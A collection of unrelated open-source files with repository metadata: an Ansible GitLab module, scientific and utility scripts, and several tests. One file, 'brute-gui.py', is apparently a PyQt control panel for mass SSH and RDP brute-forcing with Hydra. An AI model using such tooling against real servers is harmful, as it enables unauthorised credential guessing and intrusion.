self._module.exit_json(changed=True, result="Group should have updated.")
try:
group.save()
except Exception as e:
self._module.fail_json(msg="Failed to create or update a group: %s " % e)
return True
else:
return False
def deleteGroup(self):
group = self.groupObject
if len(group.projects.list()) >= 1:
self._module.fail_json(
msg="There are still projects in this group. These need to be moved or deleted before this group can be removed.")
else:
if self._module.check_mode:
self._module.exit_json(changed=True)
try:
group.delete()
except Exception as e:
self._module.fail_json(msg="Failed to delete a group: %s " % e)
return True
def existsGroup(self, name):
"""When group/user exists, object will be stored in self.groupObject."""
groups = self._gitlab.groups.list(search=name)
if len(groups) == 1:
self.groupObject = groups[0]
return True
def main():
module = AnsibleModule(
argument_spec=dict(
server_url=dict(required=True, type='str'),
validate_certs=dict(required=False, default=True, type='bool', aliases=['verify_ssl']),
login_user=dict(required=False, no_log=True, type='str'),
login_password=dict(required=False, no_log=True, type='str'),
login_token=dict(required=False, no_log=True, type='str'),
name=dict(required=True, type='str'),
path=dict(required=False, type='str'),
description=dict(required=False, type='str'),
state=dict(default="present", choices=["present", "absent"]),
),
mutually_exclusive=[
['login_user', 'login_token'],
['login_password', 'login_token']
],
required_together=[
['login_user', 'login_password']
],
required_one_of=[
['login_user', 'login_token']
],
supports_check_mode=True
)
if not HAS_GITLAB_PACKAGE:
module.fail_json(msg="Missing required gitlab module (check docs or install with: pip install python-gitlab)")
server_url = module.params['server_url']
validate_certs = module.params['validate_certs']
login_user = module.params['login_user']
login_password = module.params['login_password']
login_token = module.params['login_token']
group_name = module.params['name']
group_path = module.params['path']
description = module.params['description']
state = module.params['state']
try:
git = gitlab.Gitlab(url=server_url, ssl_verify=validate_certs, email=login_user, password=login_password,
private_token=login_token, api_version=4)
git.auth()
except (gitlab.exceptions.GitlabAuthenticationError, gitlab.exceptions.GitlabGetError) as e:
module.fail_json(msg='Failed to connect to Gitlab server: %s' % to_native(e))
if group_path is None:
group_path = group_name.replace(" ", "_")
group = GitLabGroup(module, git)
group_exists = group.existsGroup(group_name)
if group_exists and state == "absent":
if group.deleteGroup():
module.exit_json(changed=True, result="Successfully deleted group %s" % group_name)
else:
if state == "absent":
module.exit_json(changed=False, result="Group deleted or does not exists")
else:
if group.createOrUpdateGroup(name=group_name, path=group_path, description=description):
module.exit_json(changed=True, result="Successfully created or updated the group %s" % group_name)
else:
module.exit_json(changed=False, result="No need to update the group %s" % group_name)
if __name__ == '__main__':
main()
|
gregdek/ansible
|
lib/ansible/modules/source_control/gitlab_group.py
|
Python
|
gpl-3.0
| 7,470 | 0.002544 |
import sys, psutil, subprocess, time
from PyQt4 import QtGui
global config
def kill(proc_pid):
try:
process = psutil.Process(proc_pid)
for proc in process.children(recursive=True):
proc.kill()
process.kill()
except Exception as e:
print "Can't kill process",proc_pid,e
def parseConfig():
global config
class Config(object):
pass
config = Config()
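# Parse ./config.py as simple KEY="value" lines: skip blank and comment lines,
# strip inline comments and trailing '\r', then build a dict mapping each key
# to its (unquoted) value and expose it as attributes of the config object.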
try:
with open("./config.py","r") as CR:
L = CR.readlines()
LL = filter(lambda x : x != "\n" and x[0] != "#", L)
LLL = map(lambda x : x.split("#")[0].split("\n")[0] , LL)
LLL = map(lambda x: x[:-1] if x[-1] == "\r" else x , LLL)
DL = dict([[l.split("=")[0],
("=".join(l.split("=")[1:])).split("\"")[1] if "\"" in ("=".join(l.split("=")[1:])) else ("=".join(l.split("=")[1:]))] for
l in LLL])
config.__dict__ = DL
except Exception as e:
print "[ERROR] Configuration parsing failed:", e
return False
return True
class BruteGui(QtGui.QMainWindow):
def __init__(self):
super(BruteGui, self).__init__()
self.initUI()
self.id_server = "./id_server.exe"
self.id_process = None
def initUI(self):
#Layout
widget = QtGui.QWidget(self)
grid = QtGui.QGridLayout()
grid.setSpacing(10)
#Buttons
controlButtons = ["Load","Id","Start","Stop","Log"]
self.Buttons = []
for ib,cb in zip(range(len(controlButtons)),controlButtons):
self.Buttons.append(QtGui.QPushButton(cb))
self.Buttons[-1].clicked.connect(self.buttonPushed)
#if cb == "Log":
# self.Buttons[-1].setCheckable(True)
grid.addWidget(self.Buttons[-1],ib,3)
#Lines
inputLines = ["REFRESH:","ID IP:","HTTP IP:","FTP IP:","FTP USER:","FTP PASS:","FTP DIRECTORY:","SSH OPTS:","RDP OPTS:","MAX THREADS:"]
inputLinesV = ["control_updateTime", "ID_server", "server", "ftp_ip", "ftp_user", "ftp_pass",
"ftp_dir", "service_ssh", "service_rdp", "hydra_thread_limit"]
self.LableLines = []
for ib, cb, vcb in zip(range(len(inputLines)), inputLines, inputLinesV):
QLE = QtGui.QLineEdit()
QLE.setText(config.__dict__[vcb])
self.LableLines.append([vcb,(QtGui.QLabel(cb),QLE)])
grid.addWidget(self.LableLines[-1][1][0], ib,0)
grid.addWidget(self.LableLines[-1][1][1], ib,1)
self.LableLines = dict(self.LableLines)
widget.setLayout(grid)
self.setCentralWidget(widget)
self.statusBar()
self.setGeometry(500, 500, 500, 300)
self.setWindowTitle('Brute Massive Force : SSH+RDP ')
self.show()
def buttonPushed(self):
global config
sender = self.sender()
ts = sender.text()
#["Load", "Id", "Start", "Stop", "Log"]
if(ts == "Load"):
for l in self.LableLines:
config.__dict__[l] = str(self.LableLines[l][1].text())
with open("./config.py","w") as WF:
for c in config.__dict__:
WF.write(str(c) + "=\"" + config.__dict__[c] + "\"\n")
with open(config.server_control, "w") as WF:
WF.write("load")
elif(ts== "Id"):
if self.id_process != None:
kill(self.id_process.pid)
self.id_process = subprocess.Popen([self.id_server])
with open(config.server_control, "w") as WF:
WF.write("id")
elif(ts == "Start"):
with open(config.server_control, "w") as WF:
WF.write("start")
elif(ts == "Stop"):
with open(config.server_control, "w") as WF:
WF.write("stop")
elif (ts == "Log"):
with open(config.server_control, "w") as WF:
WF.write("log")
time.sleep(float(config.control_updateTime))
self.statusBar().showMessage(sender.text())
def closeEvent(self, event):
if self.id_process != None:
kill(self.id_process.pid)
def main():
parseConfig()
#t_id_server = threading.Thread(target=id_server)
app = QtGui.QApplication(sys.argv)
ex = BruteGui()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
satiros12/MassHydra
|
brute-gui.py
|
Python
|
mit
| 4,425 | 0.011299 |
class PublishService():
def __init__(self, providers, experiment):
self.rc_providers = providers
self.experiment = experiment
self.provider = self._get_provider()
def _get_provider(self):
from tardis.tardis_portal.publish.provider.rifcsprovider import RifCsProvider
if self.rc_providers:
from django.utils.importlib import import_module
for pmodule in self.rc_providers:
# Import the module
try:
module_name, klass_name = pmodule.rsplit('.', 1)
module = import_module(module_name)
except ImportError, e:
# TODO Show appropriate error msg
raise e
# Create the Instance
try:
provider_class = getattr(module, klass_name)
provider = provider_class()
except AttributeError, e:
# TODO Show appropriate error msg
raise e
# Retrieve the provider that can deal with the experiment
if provider and provider.is_schema_valid(self.experiment):
return provider
# Can't find a matching provider, return a default one
return RifCsProvider()
def get_context(self):
return self.provider.get_rifcs_context(self.experiment)
def manage_rifcs(self, oaipath):
if self.provider.can_publish(self.experiment):
self._write_rifcs_to_oai_dir(oaipath)
else:
self._remove_rifcs_from_oai_dir(oaipath)
def _remove_rifcs_from_oai_dir(self, oaipath):
import os
filename = os.path.join(oaipath, "MyTARDIS-%s.xml" % self.experiment.id)
if os.path.exists(filename):
os.remove(filename)
def _write_rifcs_to_oai_dir(self, oaipath):
from tardis.tardis_portal.xmlwriter import XMLWriter
xmlwriter = XMLWriter()
xmlwriter.write_template_to_dir(oaipath, "MyTARDIS-%s.xml" % self.experiment.id,
self.get_template(), self.get_context())
def get_template(self):
return self.provider.get_template(self.experiment)
|
steveandroulakis/mytardis
|
tardis/tardis_portal/publish/publishservice.py
|
Python
|
bsd-3-clause
| 2,367 | 0.008872 |
from nicepy.assertions import *
from nicepy.decorators import *
from nicepy.shortcuts import *
from nicepy.utils import *
|
katakumpo/nicepy
|
nicepy/__init__.py
|
Python
|
mit
| 122 | 0 |
from myfitnesspal.client import Client # noqa
__version__ = "1.16.6"
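# Version as a tuple of ints, e.g. "1.16.6" -> (1, 16, 6).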
VERSION = tuple(int(v) for v in __version__.split("."))
|
coddingtonbear/python-myfitnesspal
|
myfitnesspal/__init__.py
|
Python
|
mit
| 128 | 0 |
# -*- coding: utf-8 -*-
# $Id: fi.py 7119 2011-09-02 13:00:23Z milde $
# Author: Asko Soukka <asko.soukka@iki.fi>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Finnish-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
# language-dependent: fixed
'huomio': 'attention',
'varo': 'caution',
'code (translation required)': 'code',
'vaara': 'danger',
'virhe': 'error',
'vihje': 'hint',
't\u00e4rke\u00e4\u00e4': 'important',
'huomautus': 'note',
'neuvo': 'tip',
'varoitus': 'warning',
'kehotus': 'admonition',
'sivupalkki': 'sidebar',
'aihe': 'topic',
'rivi': 'line-block',
'tasalevyinen': 'parsed-literal',
'ohje': 'rubric',
'epigraafi': 'epigraph',
'kohokohdat': 'highlights',
'lainaus': 'pull-quote',
'taulukko': 'table',
'csv-taulukko': 'csv-table',
'list-table (translation required)': 'list-table',
'compound (translation required)': 'compound',
'container (translation required)': 'container',
#u'kysymykset': u'questions',
'meta': 'meta',
'math (translation required)': 'math',
#u'kuvakartta': u'imagemap',
'kuva': 'image',
'kaavio': 'figure',
'sis\u00e4llyt\u00e4': 'include',
'raaka': 'raw',
'korvaa': 'replace',
'unicode': 'unicode',
'p\u00e4iv\u00e4ys': 'date',
'luokka': 'class',
'rooli': 'role',
'default-role (translation required)': 'default-role',
'title (translation required)': 'title',
'sis\u00e4llys': 'contents',
'kappale': 'sectnum',
'header (translation required)': 'header',
'footer (translation required)': 'footer',
#u'alaviitteet': u'footnotes',
#u'viitaukset': u'citations',
'target-notes (translation required)': 'target-notes'}
"""Finnish name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
# language-dependent: fixed
'lyhennys': 'abbreviation',
'akronyymi': 'acronym',
'kirjainsana': 'acronym',
'code (translation required)': 'code',
'hakemisto': 'index',
'luettelo': 'index',
'alaindeksi': 'subscript',
'indeksi': 'subscript',
'yl\u00e4indeksi': 'superscript',
'title-reference (translation required)': 'title-reference',
'title (translation required)': 'title-reference',
'pep-reference (translation required)': 'pep-reference',
'rfc-reference (translation required)': 'rfc-reference',
'korostus': 'emphasis',
'vahvistus': 'strong',
'tasalevyinen': 'literal',
'math (translation required)': 'math',
'named-reference (translation required)': 'named-reference',
'anonymous-reference (translation required)': 'anonymous-reference',
'footnote-reference (translation required)': 'footnote-reference',
'citation-reference (translation required)': 'citation-reference',
'substitution-reference (translation required)': 'substitution-reference',
'kohde': 'target',
'uri-reference (translation required)': 'uri-reference',
'raw (translation required)': 'raw',}
"""Mapping of Finnish role names to canonical role names for interpreted text.
"""
|
idea4bsd/idea4bsd
|
python/helpers/py3only/docutils/parsers/rst/languages/fi.py
|
Python
|
apache-2.0
| 3,541 | 0.001412 |
from .load_samples import load_sample_group_dsi, load_sample_group_fmri, load_sample_group_qball
import numpy as np
import bct
def test_nbs_dsi_qbi():
q = load_sample_group_qball()
d = load_sample_group_dsi()
_nbs_helper(q, d, .5, atol=0.3)
def test_nbs_paired_dsi_qbi():
pass
def test_nbs_dsi_fmri():
d = load_sample_group_dsi()
f = load_sample_group_fmri()
assert f.shape == (219, 219, 8)
_nbs_helper(d, f, .03, atol=0.03)
def test_nbs_paired_dsi_fmri():
pass
def _nbs_helper(x, y, expected_pval, atol=.05, thresh=.1, ntrials=25,
paired=False):
# comment
pval, _, _ = bct.nbs_bct(x, y, thresh, k=ntrials, paired=paired)
print(pval, expected_pval)
assert np.allclose(pval, expected_pval, atol=atol)
|
aestrivex/bctpy
|
test/nbs_test.py
|
Python
|
gpl-3.0
| 779 | 0.001284 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Execution example : python generate_zips.py "path/to/folder/to/zip" "path/to/csv/inventory/file" "survey_name"
#
# Libs
#
import csv, logging, os, sys, zipfile, zlib
#
# Config
#
log_folder = 'log'
log_level = logging.DEBUG
ignored_extensions = ['jp2', 'j2k', 'jpf', 'jpx', 'jpm', 'mj2']
ignored_files = ['.DS_Store']
#
# Functions
#
# A file is a classification plan file if its name is "planclassement.pdf"
def is_classification_file(file) :
return file == 'planclassement.pdf'
# A file is a transcription file if its name contains "_transcr_"
def is_transcr_file(file) :
return any(x in file for x in ['_transcr_', '_trans_'])
# A file is an inventory if its file name contains "_add_archives_inventaire"
def is_inventory_file(file) :
return '_add_archives_inventaire' in file
# A file is an "enquête sur l'enquête" (survey-about-the-survey) file if it is in the folder "add/ese" and its extension is ".mp3", ".xml" or ".pdf"
def is_ese_file(root, extension) :
return os.path.join('add', 'ese') in root and extension.lower() in ['mp3', 'xml', 'pdf']
# A file is a meta file if its name is "meta_documents.csv" or "meta_speakers.csv"
def is_meta_file(file) :
return file in ['meta_documents.csv', 'meta_speakers.csv']
def add_file_to_archive(zf, root, path, file) :
zf.write(os.path.join(root, file), os.path.join(root.replace(path, ''), file))
def zipdir(path, zf_ol, zf_dl) :
# zf_ol and zf_dl are zipfile handle
for root, dirs, files in os.walk(path) :
for file in files :
logging.info('Add file into archive folder : ' + os.path.join(root, file))
extension = file.split('.')[-1]
file_without_extension = file.split('.')[0]
# Ignore all the JPEG2000 files
if not extension in ignored_extensions and not file in ignored_files :
# Transcription file
if is_transcr_file(file) :
# Add ODT and PDF transcription files into "download" archive folder
if extension.lower() in ['odt', 'pdf'] :
add_file_to_archive(zf_dl, root, path, file)
# Add XML transcription files into "online" archive folder
elif extension.lower() in ['xml'] :
add_file_to_archive(zf_ol, root, path, file)
# If file is an inventory, classification or "enquête sur l'enquête", add it to "donwload" and "online" archive folder
elif is_inventory_file(file) or is_classification_file(file) or is_ese_file(root, extension) :
add_file_to_archive(zf_dl, root, path, file)
add_file_to_archive(zf_ol, root, path, file)
# If file is a meta file, add it to "online" archive folder
elif is_meta_file(file) :
add_file_to_archive(zf_ol, root, path, file)
# For other files, check into the inventory file
elif file_without_extension in recordsbyid.keys() :
if recordsbyid[file_without_extension][21] != '' :
add_file_to_archive(zf_dl, root, path, file)
if recordsbyid[file_without_extension][22] != '' :
add_file_to_archive(zf_ol, root, path, file)
# Else do nothing
else :
logging.info('#ignored : file not added into "online" archive folder neither into "download" archive folder : ' + file)
#
# Main
#
if __name__ == '__main__' :
if len(sys.argv) <= 3 :
print ''
print 'Arguments error'
print 'Correct usage : python ' + sys.argv[0] + ' "path/to/folder/to/zip" "path/to/csv/inventory/file" "survey_name"'
print 'The first argument is mandatory and is the path to the folder to zip'
print 'The second argument is mandatory and is the path to the CSV inventory file'
print 'The third argument is not mandatory and is the name of the survey, this is used to name the archive folders'
else :
# Check that log folder exists, else create it
if not os.path.exists(log_folder) :
os.makedirs(log_folder)
# Create the archive folders names
survey_name = sys.argv[3] if len(sys.argv) == 4 else 'survey'
zip_online_folder_name = survey_name + '-ol.zip'
zip_download_folder_name = survey_name + '-dl.zip'
# Create log file
# log_file = log_folder + path_separator + sys.argv[0].replace('.py', '.log')
log_file = os.path.join(log_folder, sys.argv[0].replace('.py', '.log'))
logging.basicConfig(filename = log_file, filemode = 'w', format = '%(asctime)s | %(levelname)s | %(message)s', datefmt = '%m/%d/%Y %I:%M:%S %p', level = log_level)
logging.info('Start')
# Parse inventory file
logging.info('Parse inventory file')
inventory_file = sys.argv[2]
recordsbyid = {}
with open(inventory_file, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='"')
for x in spamreader :
if len(x) == 23 :
recordsbyid[x[1]] = x
# Create archive folder
zf_ol = zipfile.ZipFile(zip_online_folder_name, mode='w', compression=zipfile.ZIP_DEFLATED, allowZip64=1)
zf_dl = zipfile.ZipFile(zip_download_folder_name, mode='w', compression=zipfile.ZIP_DEFLATED, allowZip64=1)
logging.info('Create archive folders')
# Add files into archive folder
zipdir(sys.argv[1], zf_ol, zf_dl)
logging.info('Online folder zipped into file : ' + zip_online_folder_name)
logging.info('Download folder zipped into file : ' + zip_download_folder_name)
print ''
print 'Online folder zipped into file : ' + zip_online_folder_name
print 'Download folder zipped into file : ' + zip_download_folder_name
zf_ol.close()
zf_dl.close()
|
CDSP/generate_zips
|
generate_zips.py
|
Python
|
gpl-3.0
| 5,314 | 0.026177 |
#!/usr/bin/env python2
#
##############################################################################
### NZBGET POST-PROCESSING SCRIPT ###
# Post-Process to CouchPotato, SickBeard, NzbDrone, Mylar, Gamez, HeadPhones.
#
# This script sends the download to your automated media management servers.
#
# NOTE: This script requires Python to be installed on your system.
##############################################################################
#
### OPTIONS ###
## General
# Auto Update nzbToMedia (0, 1).
#
# Set to 1 if you want nzbToMedia to automatically check for and update to the latest version
#auto_update=0
# Safe Mode protection of DestDir (0, 1).
#
# Enable/Disable a safety check to ensure we don't process all downloads in the default_downloadDirectory by mistake.
#safe_mode=1
## Gamez
# Gamez script category.
#
# category that gets called for post-processing with Gamez.
#gzCategory=games
# Gamez api key.
#gzapikey=
# Gamez host.
#
# The ipaddress for your Gamez server. e.g For the Same system use localhost or 127.0.0.1
#gzhost=localhost
# Gamez port.
#gzport=8085
# Gamez uses ssl (0, 1).
#
# Set to 1 if using ssl, else set to 0.
#gzssl=0
# Gamez library
#
# move downloaded games here.
#gzlibrary
# Gamez web_root
#
# set this if using a reverse proxy.
#gzweb_root=
# Gamez watch directory.
#
# set this to where your Gamez completed downloads are.
#gzwatch_dir=
## Posix
# Niceness for external tasks Extractor and Transcoder.
#
# Set the Niceness value for the nice command. These range from -20 (most favorable to the process) to 19 (least favorable to the process).
#niceness=10
# ionice scheduling class (0, 1, 2, 3).
#
# Set the ionice scheduling class. 0 for none, 1 for real time, 2 for best-effort, 3 for idle.
#ionice_class=2
# ionice scheduling class data.
#
# Set the ionice scheduling class data. This defines the class data, if the class accepts an argument. For real time and best-effort, 0-7 is valid data.
#ionice_classdata=4
## WakeOnLan
# use WOL (0, 1).
#
# set to 1 to send WOL broadcast to the mac and test the server (e.g. xbmc) on the host and port specified.
#wolwake=0
# WOL MAC
#
# enter the mac address of the system to be woken.
#wolmac=00:01:2e:2D:64:e1
# Set the Host and Port of a server to verify system has woken.
#wolhost=192.168.1.37
#wolport=80
### NZBGET POST-PROCESSING SCRIPT ###
##############################################################################
import sys
import nzbToMedia
section = "Gamez"
result = nzbToMedia.main(sys.argv, section)
sys.exit(result)
|
DxCx/nzbToMedia
|
nzbToGamez.py
|
Python
|
gpl-3.0
| 2,702 | 0.011843 |
from __future__ import division
import itertools as it
import numpy as np
import scipy.linalg as sl
import matplotlib.pyplot as plt
import csv
import sys
from zdict import zdict
# hbar^2/2m in eV-Ang^2
hb2m0 = 3.807
# hcR_infty (eV per Rydberg)
Ry = 13.60569253
def mag2(V):
""" Return the magnitude squared of a tuple, list, or array """
return sum([v**2 for v in V])
class EPM(object):
def __init__(self,m,a0,VS,VA,bands):
self.a0 = a0
self.bands = bands
# Range of Fourier modes
d = range(-m,1+m)
# Construct all G-vectors in reciprocal lattice basis
G = [np.array((-i+j+k,i-j+k,i+j-k)) for i in d for j in d for k in d]
# Restrict to vectors of squared magnitude 12 or less
self.G = [g for g in G if mag2(g) < 13]
# Number of G vectors
ng = len(self.G)
# Assemble potential part of Hamiltonian
self.H = np.zeros((ng,ng),dtype=complex)
# Loop over all pairs of G vectors
for ii in range(ng):
for jj in range(ii,ng):
# Difference between two G vectors
dg = self.G[jj]-self.G[ii]
dgmag2 = mag2(dg)
# Dot product of dg and tau
theta = np.pi*sum(dg)/4
c = np.cos(theta)
s = np.sin(theta)
self.H[ii,jj] = (VS[dgmag2]*c-1j*VA[dgmag2]*s)*Ry
self.H[jj,ii] = self.H[ii,jj].conj()
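# Cohen-Bergstresser form of the pseudopotential matrix element: the symmetric
# and antisymmetric form factors are weighted by cos(G.tau) and sin(G.tau),
# where theta above equals G.tau for the two-atom basis at +/- tau = (a0/8)(1,1,1).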
def solve(self,k):
# Incorporate kinetic (main diagonal) part of Hamiltonian
kpg2 = np.array([mag2(k-g) for g in self.G])
kinetic = hb2m0*kpg2*(2*np.pi/self.a0)**2
# Insert diagonal elements
np.fill_diagonal(self.H,kinetic)
# Calculate eigenvalues of a Hermitian matrix
E = sl.eigvalsh(self.H)[:self.bands]
return E
if __name__ == '__main__':
# Name of semiconductor, e.g. Si, GaAs, InP, ZnS...
material = sys.argv[1]
reader = csv.reader(open('form_factors.csv','r'),delimiter=',')
param = [[entry.split()[0] for entry in row] for row in reader]
# Store form factors in dictionaries
VS = zdict()
VA = zdict()
a0 = None
# Read form factors and lattice constant from file
row = [p[0] for p in param].index(material)
for i in range(1,len(param[0])):
exec(param[0][i] + '=' + param[row][i])
# Symmetry points in the FCC/Zincblende Brillouin zone
bz = {r'$\Gamma$':np.array((0,0,0)),
r'X':np.array((0,1,0)),
r'L':np.array((1/2,1/2,1/2)),
r'W':np.array((1/2,1,0)),
r'U':np.array((1/4,1,1/2)),
r'K':np.array((3/4,3/4,0))}
# Follow this path through the Brillouin zone to construct
# the band diagram
path = [r'L',r'$\Gamma$',r'X',r'W',r'K',r'$\Gamma$']
path_dex = range(len(path)-1)
# Highest Fourier mode to use
fmodes = 3
# Number of energy bands to compute
bands = 8
# Number of k-point along each path to evaluate
kpts = 40
# k-space path parametric variable
t = np.linspace(0,1,kpts)
# Construct solver object
epm = EPM(fmodes,a0,VS,VA,bands)
# Sequence of path directions in k-space
kdir = np.diff(np.vstack([bz[p] for p in path]),n=1,axis=0)
# Lengths of k-space path segments
path_length = [np.sqrt(mag2(k)) for k in kdir]
# Relative positions of k-space symmetry points along x axis
xticks = np.cumsum([0]+path_length)
x=np.hstack([xticks[i]*(1-t)+xticks[i+1]*t for i in path_dex])
# Parameterize path between two Brilluoin zone symmetry points
K = lambda d: (np.outer((1-t),bz[path[d]])+np.outer(t,bz[path[d+1]]))
# Compute eigenvalues along k-space path
E = np.vstack([np.vstack([epm.solve(k) for k in K(j)]) for j in path_dex])
Emin = np.min(E)-1
Emax = np.max(E)+1
# Display E-k diagram
fig = plt.figure(1,(10,6))
plt.plot(x,E,'r-',lw=2)
plt.xlim(x[0],x[-1])
plt.ylim(Emin,Emax)
plt.xticks(xticks,path,fontsize=20)
plt.ylabel('Energy (eV)',fontsize=20)
plt.title(material + ' bandstructure by EPM without S-O')
plt.vlines(xticks,Emin,Emax)
plt.show()
|
gregvw/EPM-FCC-bulk
|
epm.py
|
Python
|
mit
| 4,240 | 0.020755 |
"""
Copyright 2018-present Airbnb, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
import os
from mock import patch
from moto import mock_ssm
from nose.tools import assert_count_equal, assert_equal, assert_false, assert_true, raises
from aliyunsdkcore.acs_exception.exceptions import ServerException
from streamalert.apps._apps.aliyun import AliyunApp
from tests.unit.streamalert.apps.test_helpers import get_event, put_mock_params
from tests.unit.streamalert.shared.test_config import get_mock_lambda_context
@mock_ssm
class TestAliyunApp:
"""Test class for the AliyunApp"""
# pylint: disable=protected-access
@patch.dict(os.environ, {'AWS_DEFAULT_REGION': 'us-east-1'})
def setup(self):
"""Setup before each method"""
# pylint: disable=attribute-defined-outside-init
self._test_app_name = 'aliyun'
put_mock_params(self._test_app_name)
self._event = get_event(self._test_app_name)
self._context = get_mock_lambda_context(self._test_app_name, milliseconds=100000)
self._app = AliyunApp(self._event, self._context)
def test_sleep_seconds(self):
"""AliyunApp - Sleep Seconds"""
assert_equal(0, self._app._sleep_seconds())
def test_date_formatter(self):
"""AliyunApp - Date Formatter"""
assert_equal(self._app.date_formatter(), '%Y-%m-%dT%H:%M:%SZ')
def test_required_auth_info(self):
"""AliyunApp - Required Auth Info"""
assert_count_equal(list(self._app.required_auth_info().keys()),
{'access_key_id', 'access_key_secret', 'region_id'})
def test_region_validator_success(self):
"""AliyunApp - Region Validation, Success"""
validation_function = self._app.required_auth_info()['region_id']['format']
assert_equal(validation_function('ap-northeast-1'), 'ap-northeast-1')
def test_region_validator_failure(self):
"""AliyunApp - Region Validation, Failure"""
validation_function = self._app.required_auth_info()['region_id']['format']
assert_equal(validation_function('ap-northeast'), False)
@raises(ServerException)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
@patch('logging.Logger.exception')
def test_server_exception(self, log_mock, client_mock):
"""AliyunApp - Gather Logs, Exception"""
client_mock.side_effect = ServerException("error", "bad server response")
self._app._gather_logs()
log_mock.assert_called_with("%s error occurred", "Server")
def test_gather_logs_last_timestamp_set(self):
"""AliyunApp - Request Creation"""
assert_equal(self._app.request.get_StartTime(), '2018-07-23T15:42:11Z')
assert_equal(self._app.request.get_MaxResults(), AliyunApp._MAX_RESULTS)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_no_more_entries(self, client_mock):
"""AliyunApp - Gather Logs with no entries"""
client_mock.return_value = '{"RequestId":"B1DE97F8-5450-4593-AB38-FB61B799E91D",' \
'"Events":[],"EndTime":"2018-07-23T19:28:00Z",' \
'"StartTime":"2018-06-23T19:28:30Z"}'
logs = self._app._gather_logs()
assert_equal(0, len(logs))
assert_false(self._app._more_to_poll)
assert_equal("2018-07-23T19:28:00Z", self._app._last_timestamp)
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_entries(self, client_mock):
"""AliyunApp - Gather Logs with some entries"""
client_mock.return_value = '{"NextToken":"20","RequestId":'\
'"B1DE97F8-5450-4593-AB38-FB61B799E91D",' \
'"Events":[{"eventTime":"123"},{"eventTime":"123"}],' \
'"EndTime":"2018-07-23T19:28:00Z",' \
'"StartTime":"2018-06-23T19:28:30Z"}'
logs = self._app._gather_logs()
assert_equal(2, len(logs))
assert_true(self._app._more_to_poll)
assert_equal(self._app.request.get_NextToken(), "20")
@patch('streamalert.apps.app_base.AppIntegration._invoke_successive_app')
@patch('streamalert.apps.batcher.Batcher._send_logs_to_lambda')
@patch('streamalert.apps._apps.aliyun.AliyunApp._sleep_seconds')
@patch('aliyunsdkcore.client.AcsClient.do_action_with_exception')
def test_gather_logs_last_timestamp(self, client_mock, sleep_mock, batcher_mock, _):
"""AliyunApp - Test last_timestamp"""
# mock 3 responses
mock_resps = [
{
'NextToken': '50',
'RequestId': 'AAAAAAAA',
'Events': [
{
'eventTime': '2018-06-23T19:29:00Z'
},
{
'eventTime': '2018-06-23T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-23T19:28:30Z'
},
{
'NextToken': '100',
'RequestId': 'BBBBBBBBB',
'Events': [
{
'eventTime': '2018-06-24T19:29:00Z'
},
{
'eventTime': '2018-06-24T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-23T19:28:30Z'
},
{
'NextToken': '150',
'RequestId': 'CCCCCCCC',
'Events': [
{
'eventTime': '2018-06-25T19:29:00Z'
},
{
'eventTime': '2018-06-25T19:28:00Z'
}
],
'EndTime': '2018-07-23T19:28:00Z',
'StartTime': '2018-06-23T19:28:30Z'
}
]
client_mock.side_effect = [json.dumps(r, separators=(',', ':')) for r in mock_resps]
        # Mock remaining time. The _sleep_seconds() method is called twice for each
        # call to gather logs via the Aliyun API. Set the sleep seconds to a large
        # number to mimic the corner case where there are still more logs to pull
        # when the Lambda function timeout is reached. In this case, _last_timestamp
        # should still be updated correctly.
sleep_mock.side_effect = [0, 0, 0, 0, 1000000, 0]
        # Mock 3 batcher calls to invoke the successive Lambda function since there are more logs
batcher_mock.side_effect = [True, True, True]
self._app.gather()
assert_equal(self._app._poll_count, 3)
assert_true(self._app._more_to_poll)
assert_equal(self._app.request.get_NextToken(), "150")
assert_equal(self._app._last_timestamp, '2018-07-23T19:28:00Z')
|
airbnb/streamalert
|
tests/unit/streamalert/apps/test_apps/test_aliyun.py
|
Python
|
apache-2.0
| 7,474 | 0.002141 |
# GONZO: A PYTHON SCRIPT TO RECORD PHP ERRORS INTO MONGO
# Michael Vendivel - vendivel@gmail.com
import subprocess
import datetime
from pymongo import MongoClient
# where's the log file
filename = '/path/to/php/logs.log'
# set up mongo client
client = MongoClient('mongo.server.address', 27017)
# which DB
db = client.logs
# which Collection
php_logs = db.php_logs
# open a subprocess to tail (and follow) the log file
f = subprocess.Popen(['tail', '-f', filename],
                     stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# continue to read the file and record lines into mongo
while True:
# read line by line
line = f.stdout.readline()
# compose the document to be inserted
post = {"line": line,
"created": datetime.datetime.utcnow()
}
# insert the document into the Collection
post_id = php_logs.insert(post)
# output the line for visual debugging (optional)
print line
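# Each inserted document then looks roughly like this (hypothetical values,
# shown in Mongo shell notation):
#
#   {
#       "_id": ObjectId("..."),
#       "line": "[01-Jan-2016 00:00:00 UTC] PHP Warning: ...",
#       "created": ISODate("2016-01-01T00:00:00Z")
#   }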
|
mven/gonzo.py
|
gonzo.py
|
Python
|
mit
| 888 | 0.023649 |
#!/usr/bin/env python
# coding: utf-8
"""
multiprocessTask.py
~~~~~~~~~~~~~~~~~~~
a multiprocess model of producer/consumer
task = Task(work_func, 1, 3, counter=0, a='', callback=cb)
results = task.run()
for i in xrange(26):
lines = ["%d" % i] * random.randint(10, 20)
task.put(lines)
task.finish()
"""
import os
import time
from multiprocessing import Pool as ProcessPool, Manager, cpu_count
